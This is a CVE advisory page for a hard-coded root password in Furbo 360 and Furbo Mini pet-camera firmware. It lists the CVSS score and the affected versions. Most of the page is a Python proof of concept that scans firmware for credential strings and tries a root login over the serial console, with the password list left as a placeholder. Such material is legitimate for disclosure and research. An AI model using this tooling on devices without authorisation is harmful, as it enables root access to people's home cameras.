Security Vulnerability Report
CVE-2025-11649 CVSS 7.0 HIGH

CVE-2025-11649

Published: 2025-10-12 23:15:33
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was found in Tomofun Furbo 360 and Furbo Mini. The affected element is an unknown function of the component Root Account Handler. Performing manipulation results in use of hard-coded password. The attack must be initiated from a local position. The attack is considered to have high complexity. The exploitability is described as difficult. The exploit has been made public and could be used. The firmware versions determined to be affected are Furbo 360 up to FB0035_FW_036 and Furbo Mini up to MC0020_FW_074. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score: 7.0
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:furbo:furbo_mini_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:furbo:furbo_mini:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:furbo:furbo_360_dog_camera_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:furbo:furbo_360_dog_camera:*:*:*:*:*:*:*:* - NOT VULNERABLE
Tomofun Furbo 360 <= FB0035_FW_036
Tomofun Furbo Mini <= MC0020_FW_074

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11649 - Furbo Hard-coded Password PoC
# Reference: https://github.com/dead1nfluence/Furbo-Advisories/blob/main/Hardcoded-Password.md
# Step 1: Extract firmware from device or download from official source
# Furbo 360: FB0035_FW_036
# Furbo Mini: MC0020_FW_074
import re
import sys


def extract_strings_from_firmware(firmware_path, min_length=6):
    """Extract printable strings from firmware binary for analysis"""
    strings = []
    with open(firmware_path, 'rb') as f:
        data = f.read()
    # Find ASCII strings in binary
    pattern = rb'[\x20-\x7e]{%d,}' % min_length
    matches = re.findall(pattern, data)
    for match in matches:
        strings.append(match.decode('ascii', errors='ignore'))
    return strings


def search_hardcoded_credentials(firmware_path):
    """Search for hard-coded credentials in firmware"""
    strings = extract_strings_from_firmware(firmware_path)
    # Common patterns for credentials
    credential_patterns = [
        r'root[:\s]+\S+',
        r'admin[:\s]+\S+',
        r'password[:\s]+\S+',
        r'pass[:\s]+\S+',
        r'pwd[:\s]+\S+',
    ]
    found_credentials = []
    for s in strings:
        for pattern in credential_patterns:
            matches = re.findall(pattern, s, re.IGNORECASE)
            if matches:
                found_credentials.extend(matches)
    return found_credentials


def attempt_login_via_serial(port, baudrate=115200, username='root'):
    """
    Attempt to login via serial console using hard-coded credentials
    Requires physical access to UART pins on the device
    """
    try:
        import serial
    except ImportError:
        print("[-] pyserial not installed. Run: pip install pyserial")
        return False
    try:
        # The context manager closes the port on every exit path
        with serial.Serial(port, baudrate, timeout=5) as ser:
            # read_until() takes no timeout argument; the port timeout
            # bounds how long each prompt wait can block
            ser.timeout = 10
            # Wait for login prompt
            output = ser.read_until(b'login:')
            print(f"[*] Received: {output.decode(errors='ignore')}")
            # Send username
            ser.write(f"{username}\n".encode())
            # Wait for password prompt
            output = ser.read_until(b'Password:')
            print(f"[*] Received: {output.decode(errors='ignore')}")
            ser.timeout = 5
            # Try hard-coded passwords discovered from firmware analysis
            # NOTE: Actual passwords should be extracted from firmware binary
            hardcoded_passwords = [
                # Placeholder - actual passwords extracted from firmware
            ]
            for pwd in hardcoded_passwords:
                ser.write(f"{pwd}\n".encode())
                output = ser.read(1024)
                # A shell prompt character indicates a successful login
                if b'$' in output or b'#' in output:
                    print(f"[+] SUCCESS! Logged in with password: {pwd}")
                    return True
    except Exception as e:
        print(f"[-] Error: {e}")
    return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <firmware_binary>")
        print(f"Example: {sys.argv[0]} FB0035_FW_036.bin")
        sys.exit(1)
    firmware_path = sys.argv[1]
    print(f"[*] Analyzing firmware: {firmware_path}")
    creds = search_hardcoded_credentials(firmware_path)
    if creds:
        print(f"[+] Found {len(creds)} potential hard-coded credentials:")
        for c in creds:
            print(f" - {c}")
    else:
        print("[-] No obvious credentials found with simple patterns")
        print("[*] Try manual analysis with tools like binwalk, strings, or Ghidra")

References

Raw JSON Data
